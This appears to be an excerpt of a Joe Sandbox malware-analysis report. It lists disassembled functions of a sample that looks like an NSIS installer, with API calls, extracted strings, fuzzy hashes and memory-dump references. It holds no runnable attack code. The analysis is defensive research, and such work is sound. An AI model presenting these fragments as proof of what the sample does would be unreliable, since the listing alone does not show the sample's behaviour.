Associated: 00000000.00000002.168239788723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239919689.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_JHPvqMzKbz.jbxd

Similarity

API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp$1C
API String ID: 2435955865-239407132
Opcode ID: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
Instruction ID: 7cf1fa831aca86d96b8495533088dbe4cf0b0326274ef0a42366eb07f7c747b9
Opcode Fuzzy Hash: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
Instruction Fuzzy Hash: C4A1B671544305BAD6207F629D4AF1B3EACAF0070AF15483FF585B61D2DBBC8A448B6E

Function 004074BB Relevance: 5.4, APIs: 4, Instructions: 382
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.168239757238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.168239725080.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239788723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239919689.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_JHPvqMzKbz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
Instruction ID: b44593247c4c050b0e646bb53675e7b1a8962b0b92449cff70e8ee1879f4dc4f
Opcode Fuzzy Hash: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
Instruction Fuzzy Hash: 00F14871908249DBDF18CF28C8946E93BB1FF44345F14852AFD5A9B281D338E986DF86

Function 004062FC Relevance: 4.5, APIs: 3, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
GetProcAddress.KERNEL32(00000000), ref: 00406327

Memory Dump Source

Source File: 00000000.00000002.168239757238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.168239725080.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239788723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239919689.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_JHPvqMzKbz.jbxd

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID:
API String ID: 310444273-0
Opcode ID: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
Instruction ID: 23f85fcbdf3119ad7ff9d94b99dcad510d7c567b01d836bd9cab37df641e0753
Opcode Fuzzy Hash: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
Instruction Fuzzy Hash: 53D0123120010597C6001B65AE0895F776CEF95611707803EF542F3132EB34D415AAEC

Function 004062D5 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
FindClose.KERNEL32(00000000), ref: 004062EC

Memory Dump Source

Source File: 00000000.00000002.168239757238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.168239725080.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239788723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239919689.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_JHPvqMzKbz.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
Instruction ID: 3dd5e1b78c12f0f437ff376ab6b0e1f90f8becb0d3509d6a9a7f52ed6ae53baf
Opcode Fuzzy Hash: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
Instruction Fuzzy Hash: 7AD0C9315041205BC25127386E0889B6A589F163723258A7AB5A6E11E0CB388C2296A8

Function 00405479 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054B5
ShowWindow.USER32(?), ref: 004054D2
DestroyWindow.USER32 ref: 004054E6
SetWindowLongW.USER32(?,00000000,00000000), ref: 00405502
GetDlgItem.USER32(?,?), ref: 00405523
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405537
IsWindowEnabled.USER32(00000000), ref: 0040553E
GetDlgItem.USER32(?,00000001), ref: 004055ED
GetDlgItem.USER32(?,00000002), ref: 004055F7
SetClassLongW.USER32(?,000000F2,?), ref: 00405611
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00405662
GetDlgItem.USER32(?,00000003), ref: 00405708
ShowWindow.USER32(00000000,?), ref: 0040572A
KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040573C
EnableWindow.USER32(?,?), ref: 00405757
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040576D
EnableMenuItem.USER32(00000000), ref: 00405774
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040578C
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040579F
lstrlenW.KERNEL32(00447240,?,00447240,0046ADC0), ref: 004057C8
SetWindowTextW.USER32(?,00447240), ref: 004057DC
ShowWindow.USER32(?,0000000A), ref: 00405910

Strings

@rD, xrefs: 004057B9

Memory Dump Source

Source File: 00000000.00000002.168239757238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.168239725080.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239788723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239919689.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_JHPvqMzKbz.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID: @rD
API String ID: 3282139019-3814967855
Opcode ID: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
Instruction ID: 0f9b988f21b44e482dc064b3562f20aa73efc2902ac8c6ffeb9ddf27563d0ddb
Opcode Fuzzy Hash: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
Instruction Fuzzy Hash: D8C1C371500A04EBDB216F61EE49E2B3BA9EB45345F00093EF551B12F0DB799891EF2E

Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351
sleepfilewindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostQuitMessage.USER32(00000000), ref: 00401648
Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
SetForegroundWindow.USER32(?), ref: 004016CB
ShowWindow.USER32(?), ref: 00401753
ShowWindow.USER32(?), ref: 00401767
SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
SetCurrentDirectoryW.KERNELBASE(?,004CB0B0,?,000000E6,0040F0D0,?,?,?,000000F0,?,000000F0), ref: 00401885
MoveFileW.KERNEL32(00000000,?), ref: 00401908
GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,0040F0D0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE

Strings

CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
Rename on reboot: %s, xrefs: 00401943
CreateDirectory: "%s" (%d), xrefs: 004017BF
SetFileAttributes: "%s":%08X, xrefs: 0040177B
IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
Jump: %d, xrefs: 00401602
BringToFront, xrefs: 004016BD
Sleep(%d), xrefs: 0040169D
IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
SetFileAttributes failed., xrefs: 004017A1
Rename: %s, xrefs: 004018F8
CreateDirectory: "%s" created, xrefs: 00401849
Call: %d, xrefs: 0040165A
detailprint: %s, xrefs: 00401679
Aborting: "%s", xrefs: 0040161D
Rename failed: %s, xrefs: 0040194B

Memory Dump Source

Source File: 00000000.00000002.168239757238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.168239725080.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239788723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239919689.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_JHPvqMzKbz.jbxd

Similarity

API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
API String ID: 2872004960-3619442763
Opcode ID: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
Instruction ID: b6b48939bc8a7188504c618ab7841b31fdd5898bf24c808f75461ec369738802
Opcode Fuzzy Hash: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
Instruction Fuzzy Hash: 0AB1F471A00204ABDB10BF61DD46DAE3B69EF44314B21817FF946B21E1DA7D4E40CAAE

Function 0040592C Relevance: 44.0, APIs: 15, Strings: 10, Instructions: 233
stringregistrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327

lstrcatW.KERNEL32(004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0,-00000002,00000000,004D70C8,00403AC1,?), ref: 004059AE
lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0), ref: 00405A30
lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000), ref: 00405A43
GetFileAttributesW.KERNEL32(: Completed), ref: 00405A4E

Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E

LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C70A8), ref: 00405AB7
RegisterClassW.USER32(0046AD60), ref: 00405B0A
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B22
CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B5B

Part of subcall function 00403E95: SetWindowTextW.USER32(00000000,0046ADC0), ref: 00403F30

ShowWindow.USER32(00000005,00000000), ref: 00405B91
LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BA2
LoadLibraryW.KERNEL32(RichEd32), ref: 00405BAD
GetClassInfoW.USER32(00000000,RichEdit20A,0046AD60), ref: 00405BBD
GetClassInfoW.USER32(00000000,RichEdit,0046AD60), ref: 00405BCA
RegisterClassW.USER32(0046AD60), ref: 00405BD3
DialogBoxParamW.USER32(?,00000000,00405479,00000000), ref: 00405BF2

Strings

.DEFAULT\Control Panel\International, xrefs: 00405999
Control Panel\Desktop\ResourceLocale, xrefs: 00405972
: Completed, xrefs: 004059F6, 004059FB, 00405A0C, 00405A5D, 00405A63
RichEd32, xrefs: 00405BA8
RichEd20, xrefs: 00405B9D
RichEdit20A, xrefs: 00405BB6, 00405BBB
_Nb, xrefs: 00405AD1
.exe, xrefs: 00405A3D
@rD, xrefs: 00405965
RichEdit, xrefs: 00405BC4

Memory Dump Source

Source File: 00000000.00000002.168239757238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.168239725080.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239788723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239919689.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_JHPvqMzKbz.jbxd

Similarity

API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$: Completed$@rD$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
API String ID: 608394941-2509908559
Opcode ID: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
Instruction ID: 271ce27004ef92612bfc9362a6cc74883a37054a4c8cca7c49d128c059fded9a
Opcode Fuzzy Hash: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
Instruction Fuzzy Hash: 5E71A370604B04AED721AB65EE85F2736ACEB44749F00053FF945B22E2D7B89D418F6E

Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

lstrcatW.KERNEL32(00000000,00000000,ComingJanuaryRefrigerator,004CB0B0,00000000,00000000), ref: 00401A76
CompareFileTime.KERNEL32(-00000014,?,ComingJanuaryRefrigerator,ComingJanuaryRefrigerator,00000000,00000000,ComingJanuaryRefrigerator,004CB0B0,00000000,00000000), ref: 00401AA0

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

Strings

File: overwriteflag=%d, allowskipfilesflag=%d, name="%s", xrefs: 00401A39
File: error creating "%s", xrefs: 00401AF0
File: error, user retry, xrefs: 00401B40
File: error, user cancel, xrefs: 00401B93
File: error, user abort, xrefs: 00401B53
File: skipped: "%s" (overwriteflag=%d), xrefs: 00401B81
ComingJanuaryRefrigerator, xrefs: 00401A53, 00401A5C, 00401A69, 00401A7B, 00401A8C, 00401AC2, 00401AD8, 00401AEF, 00401B07, 00401B5E, 00401B80, 00401BCE, 00401C10, 00401C19, 00401C23, 00401C29, 00401C3B
File: wrote %d to "%s", xrefs: 00401BD0

Memory Dump Source

Source File: 00000000.00000002.168239757238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.168239725080.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239788723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239919689.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_JHPvqMzKbz.jbxd

Similarity

API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
String ID: ComingJanuaryRefrigerator$File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"
API String ID: 4286501637-459116980
Opcode ID: b6a2df31382c61c88927ef82d5f6ae0aba2303a4f2552ab8741c3bf9876e390d
Instruction ID: fe683e2e252f9e2189d7cf48164ff2fe6631720e8c40e43e96375682ff159270
Opcode Fuzzy Hash: b6a2df31382c61c88927ef82d5f6ae0aba2303a4f2552ab8741c3bf9876e390d
Instruction Fuzzy Hash: 9D510871901114BADF10BBB1CD46EAE3A68DF05369F21413FF416B10D2EB7C5A518AAE

Function 00403587 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00403598
GetModuleFileNameW.KERNEL32(00000000,004DF0D8,00002004,?,?,?,00000000,00403A47,?), ref: 004035B4

Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76

GetFileSize.KERNEL32(00000000,00000000,004E30E0,00000000,004CF0B8,004CF0B8,004DF0D8,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00403600

Strings

Null, xrefs: 0040367E
soft, xrefs: 00403675
Error launching installer, xrefs: 004035D7
Inst, xrefs: 0040366C
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037C5

Memory Dump Source

Source File: 00000000.00000002.168239757238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.168239725080.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239788723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239919689.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_JHPvqMzKbz.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 4283519449-527102705
Opcode ID: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
Instruction ID: 97831ba7e8e922ff386f77eab0e0d18630bd2de4bbb47cca7d976ce2c46b30f6
Opcode Fuzzy Hash: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
Instruction Fuzzy Hash: 3151D5B1900204AFDB219F65CD85B9E7EB8AB14756F10803FE605B72D1D77D9E808B9C

Function 0040337F Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 166
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004033E7
GetTickCount.KERNEL32 ref: 00403464
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403491
wsprintfW.USER32 ref: 004034A4
WriteFile.KERNELBASE(00000000,00000000,?,7FFFFFFF,00000000), ref: 004034D3
WriteFile.KERNEL32(00000000,0041F150,?,00000000,00000000,0041F150,?,000000FF,00000004,00000000,00000000,00000000), ref: 0040356A

Strings

P1B, xrefs: 004033A9
... %d%%, xrefs: 0040349E
X1C, xrefs: 004033ED
X1C, xrefs: 0040343C

Memory Dump Source

Source File: 00000000.00000002.168239757238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.168239725080.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239788723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239919689.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_JHPvqMzKbz.jbxd

Similarity

API ID: CountFileTickWrite$wsprintf
String ID: ... %d%%$P1B$X1C$X1C
API String ID: 651206458-1535804072
Opcode ID: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
Instruction ID: 0313947f0097750978ec936bbe46de4fad37e772bc1cb17ec77dd8e30cfa9ece
Opcode Fuzzy Hash: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
Instruction Fuzzy Hash: 88518D71900219ABDF10DF65AE44AAF7BACAB00316F14417BF900B7290DB78DF40CBA9

Function 00404F72 Relevance: 10.6, APIs: 7, Instructions: 73
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6

Memory Dump Source

Source File: 00000000.00000002.168239757238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.168239725080.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239788723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239919689.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_JHPvqMzKbz.jbxd

Similarity

API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
String ID:
API String ID: 2740478559-0
Opcode ID: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
Instruction ID: 1d640e6b4f0869ec625b39ce8112f9bd6789598538fb42bade37fe3884716a8e
Opcode Fuzzy Hash: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
Instruction Fuzzy Hash: 3C21B0B1900518BACF119FA5DD84E9EBFB5EF84310F10813AFA04BA291D7798E509F98

Function 00401EB9 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 78
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

GlobalFree.KERNELBASE(007CF630), ref: 00402387

Strings

Pop: stack empty, xrefs: 00401F2C
Exch: stack < %d elements, xrefs: 00401ED8
ComingJanuaryRefrigerator, xrefs: 00401EFB, 00401F00, 00401F1A

Memory Dump Source

Source File: 00000000.00000002.168239757238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.168239725080.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239788723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239919689.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_JHPvqMzKbz.jbxd

Similarity

API ID: FreeGloballstrcpyn
String ID: ComingJanuaryRefrigerator$Exch: stack < %d elements$Pop: stack empty
API String ID: 1459762280-61658404
